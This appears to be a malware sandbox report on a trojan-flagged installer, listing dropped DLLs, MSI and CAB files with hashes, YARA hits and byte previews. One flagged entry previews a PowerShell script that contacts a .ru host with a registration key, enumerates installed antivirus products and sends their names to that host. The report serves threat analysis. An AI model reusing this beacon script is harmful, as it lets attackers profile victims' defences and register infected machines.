                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                   Joe Sandbox View:
                                                   • Filename: NotaFiscal.msi, Detection: malicious
                                                   • Filename: radarinstaller.exe, Detection: malicious
                                                   • Filename: radarinstaller.exe, Detection: malicious
                                                   • Filename: Danfe2372342.msi, Detection: malicious
                                                   • Filename: Danfe2372342.msi, Detection: malicious
                                                   • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                                   • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1514
                                                  Entropy (8bit):4.251110527181249
                                                  Encrypted:false
                                                  SSDEEP:24:m53r/bG/QEOcMgu5YlqOYx+3pd53r/bG/QEoMgu5Ylq0x+3v:wTy/QEOBgllqOYw53Ty/QElgllq0wf
                                                  MD5:B702851140B7F94A10B42E22F4066D84
                                                  SHA1:C09B748507E4FDC1BCF441BA9AADC74B3ABB298A
                                                  SHA-256:5C62FF1A65C989FE7101FDB438243AE4E5F5323AED1BFE75DAFD75B83326A7EF
                                                  SHA-512:5A16457968E851DF21FF4D66012694C3B6EB4AA47B6715593FFC65613B3DAE719F73025667E3F0EA29F725C496131DE2CBB9220DAA157AE35EA3219E2BAC4A77
                                                  Malicious:false
                                                  Preview:....StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; charset=UTF-8.. Date: Mon, 21 Aug 2023 17:50:54 GMT.. Server: Apache/2.4.6 (CentOS) PHP/7.4.33.. X-Powered-By: PHP/7.4.33.. .....Forms : ..Headers : {[Connection, close], [Content-Length, 0], [Content-Type, text/html; charset=UTF-8], [Date, Mon, .. 21 Aug 2023 17:50:54 GMT]...}..Images : {}..InputFields : {}..Links : {}..ParsedHtml : ..RawContentLength : 0....404 HTTP Error..StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; ch
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):6668
                                                  Entropy (8bit):3.5127462716425657
                                                  Encrypted:false
                                                  SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                                  MD5:30C30EF2CB47E35101D13402B5661179
                                                  SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                                  SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                                  SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                                  Malicious:true
                                                  Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1854
                                                  Entropy (8bit):3.7148687475785183
                                                  Encrypted:false
                                                  SSDEEP:48:zB3tAnN1sAT1X1t+nWi2JgJ/yFTqDkagcv:V9AHsEX1tsWtJgkq9gcv
                                                  MD5:FEEA20931D1BB33EFE4B4FEA34A34007
                                                  SHA1:A77160427861E12AC9D860E40B3126E6C7F1AD9B
                                                  SHA-256:BCD9751A982C594D84C8EDBDF4CB9E9DF6B12E4E20528074CECC1453881A1314
                                                  SHA-512:ABCFA0C5CB82311C365AFFA786FA04E4B6DEDD6C0E4F4CFF9342EBAA423387A16512CF414A9C24CDB6833B018B82A1FD29F25DF73B89DFE74176E6B7343D2C5F
                                                  Malicious:true
                                                  Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .(.".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u.?.s.t.a.t.u.s.=.r.e.g.&.k.e.y.=.l.l.k.s.7.4.6.3.8.s.j.&.s.i.t.e.=.T.e.s.t.".). .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g.........s.l.e.e.p. .-.M.i.l.l.i.s.e.c.o.n.d.s. .1.2.9.7.........[.N.e.t...S.e.r.v.i.c.e.P.o.i.n.t.M.a.n.a.g.e.r.].:.:.S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l. .=. .[.N.e.t...S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l.T.y.p.e.].:.:.T.l.s.1.2.....$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .=. .G.e.t.-.W.m.i.O.b.j.e.c.t. .-.N.a.m.e.s.p.a.c.e. .".r.o.o.t.\.S.e.c.u.r.i.t.y.C.e.n.t.e.r.2.". .-.C.l.a.s.s. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t.....$.d.i.s.p.l.a.y.N.a.m.e.s. .=. .$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .|. .F.o.r.E.a.c.h.-.O.b.j.e.c.t. .{..... . . . .$._...d.i.s.p.l.a.y.N.a.m.e.....}.....$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g. .=. .$.d.i.s.p.l.a.y.N.a.m.e.s. .-.j.o.i.n. .".,. .".....$.u.r.l.1.1. .=. .".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u./.?.s.t.a.t.u.s.=.s.t.a.r.t.&.a.v.=.$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g."...
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3440640
                                                  Entropy (8bit):6.332754172601424
                                                  Encrypted:false
                                                  SSDEEP:49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
                                                  MD5:59A74284EACB95118CEDD7505F55E38F
                                                  SHA1:ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
                                                  SHA-256:7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
                                                  SHA-512:E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):2483712
                                                  Entropy (8bit):6.553977992744686
                                                  Encrypted:false
                                                  SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                  MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                  SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                  SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                  SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, Author: Joe Security
                                                  Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:Microsoft Cabinet archive data, many, 1625945 bytes, 2 files, at 0x44 +A "z2201x64.exe" +A "icon.png", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 51 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):1636377
                                                  Entropy (8bit):7.999871457469054
                                                  Encrypted:true
                                                  SSDEEP:24576:6/2i+GjI+uAld+dnnMT+EPZexEjXRfVLr5RfbZGTF37oO/ChJ8mtEMHnH:C1I+uE4nnMdx5fVD07oOdmtnH
                                                  MD5:6738E7486358FFB12D914A2CE355DEF3
                                                  SHA1:3DCB2576DAE364D198972030C20DB2903A1740C3
                                                  SHA-256:02EFB04CA84D4140D4475F317D8E7810D07894E9865582DFD9C1EEF947C85A60
                                                  SHA-512:6000841128D45CA522DF6B770ADDE47409A667E7F1E1C2A8BB61BBB0658C9604530F4B98A950310BDF3C9F2215A309F0ABF4B14021B8321CDBBF4954F15B0113
                                                  Malicious:false
                                                  Preview:MSCF....Y.......D...........................Y....(..........z...3....3.........V.. .z2201x64.exe......3.....VA. .icon.png.....M..CK..x.U.0\.]I:....`.......6*...I.....B'...$1...:U..d...T.=......:..:3...."2.i.....B.v&hf.bg...4...[......w..{......{....[..c.1&.aX.T.a.2.?.......w.q....N.k....U..........kK....O...z{.z{...u5e.w..;&C...'...l.?t..(.............d..Z....[.Wby..Zo.......mj....eUk+......&......O...0..R...S.....".X.j...F.N.3r..4qW]...hE.;|.....N......p#...4.y..@.o..........g?.#T9z..?;.<qw..T(e.........P.u.V..@._.h...z.w.k.k.}..z....1.....O......;....._M...b.....R.6...<..0$...]L.I.p.Fh ....b...Y.'ZA>T.Z....+....V..V...A.B.R(Z+....8.o..h...6h....1...P=.h..R...W.....V.zZ.]l...[.].K....;sC.7.2.n.f...3...&@..6.Xb....9.V..I.OeUgX.t...q.&...ps.... Q...].....W9.`d....T.P.QM...P.h'.e.I.2..J.....V55....g.V...}.....7*....-.*!.|.4.<.....'p.p..(....[n@.V.+'.........BF..j....ym?.$....j.A.<..q......J.R.~.....aP.~ G:m.5}..d......R\..B........[

                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1636377
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:4122C39F1D4ACC64F4D4E505814B754E
                                                  SHA1:181F83CDFDF4DC5FBC3B69EDAEA7A29093DE7FFA
                                                  SHA-256:658F96AAA0B744D2B7965EEA945FB61AE29616E9E3446C7A9CF8D20B83198272
                                                  SHA-512:2C8DD01A0645599F69B97408BBF466381CEC711168316D0C6565999F5C660D4CD090DCE6D0ABDEAA9D7E93BD3EB2BE96C60110EAF79E015F440989E27C599C74
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):2483712
                                                  Entropy (8bit):6.553977992744686
                                                  Encrypted:false
                                                  SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                  MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                  SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                  SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                  SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6766e2.msi, Author: Joe Security
                                                  Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                  SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                  SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):722336
                                                  Entropy (8bit):6.433567465029135
                                                  Encrypted:false
                                                  SSDEEP:12288:xZCGkZjiIiS4fZrmrRahiyN+bqpoMU0Z/4CwwEjD4JyVzIXyJe55EL96RgO5uh:xBkZVI+ep5U2fvEjD4wzIXX5EL96RX5u
                                                  MD5:F7B1DDC86CD51E3391AA8BF4BE48D994
                                                  SHA1:A0C0A4A77991D7F8DF722ACDD782310A6DA2A904
                                                  SHA-256:AC2DF3283D65AB78CA399232FA090764636E0FEC7AB53BE28F6EE93733D8787F
                                                  SHA-512:F853C3CF9EC175E946DD42F7F35D130F4FB941F64BBF5780CE452FE6E87459217B80872DB375AD1BBAFC47AD263408E4222D81F62C7DF92C77E23E77E67E6FA6
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......m..D)...)...).......$...........f...8...f...1.......0...f...t.......(.......>...)...F.......a.......(.....*.(...).B.(.......(...Rich)...........................PE..L.....c.........."!..."..................................................... ......q.....@.........................@M......\N..........h................#.......o..8@..p....................@..........@....................K..@....................text...|........................... ..`.rdata..Bb.......d..................@..@.data....'...p.......V..............@....rsrc...h............l..............@..@.reloc...o.......p...r..............@..B........................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):6.955008373253885
                                                  Encrypted:false
                                                  SSDEEP:48:zY1TmrW1/6pPT4MiTm1AWlyP3NZ7PHnuWhhFgPRCZnb/07oB8LyixB8hKhMOElhF:zY1TcDRT47TyAWlyfvnVhJ/07oB4fxB4
                                                  MD5:EE9508911C5E3C5D8CE51E33EF5BDEE2
                                                  SHA1:B12E94AE8A42876A3F8046FB58973C1C38E33256
                                                  SHA-256:C13C99C5C834E11233DCC835923D0474BBA981AB9503E85516BBAF262E432F67
                                                  SHA-512:8F8D68840EE45A9EB5A2FD313752A0F80F1CBCF34EE17CAB0494C47DD2B1BF37D5BD44319440EC6E1EEDFAC2AE204D100FE79E07078926B532A5CCE6D79D8CBE
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@Z..W.@.....@.....@.....@.....@.....@......&.{8415BADB-0228-466E-A597-68F06CD8880C}..Helper..Helper.msi.@.....@.....@.....@........&.{3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}.....@.....@.....@.....@.......@.....@.....@.......@......Helper......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{1DAA5F1C-35AF-4DBC-BCD3-B8B55A5E6DC0}9.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\.@.......@.....@.....@......&.{96C4647E-D5A3-492E-A70C-151AAE336B85}..01:\Software\Helper Company LLC\Helper\Version.@.......@.....@.....@......&.{E50D5DA2-61B1-4DD4-BD53-57A21481EBCF}d.01:\Software\Caphyon\Advanced Installer\LZMA\{8415BADB-0228-466E-A597-68F06CD8880C}\1.0.0\AI_ExePath.@.......@.....@.....@......&.{2E55D07B-CAEF-4B54-92D8-F9199243F537}G.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe.@.......@.....@.....@......&.{1DD84FFF-FB0

                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):634784
                                                  Entropy (8bit):6.564827321629019
                                                  Encrypted:false
                                                  SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                                  MD5:A619F980C1BAA155F7CFB79553AA10B1
                                                  SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                                  SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                                  SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................

                                                  Process:C:\Windows\System32\msiexec.exe
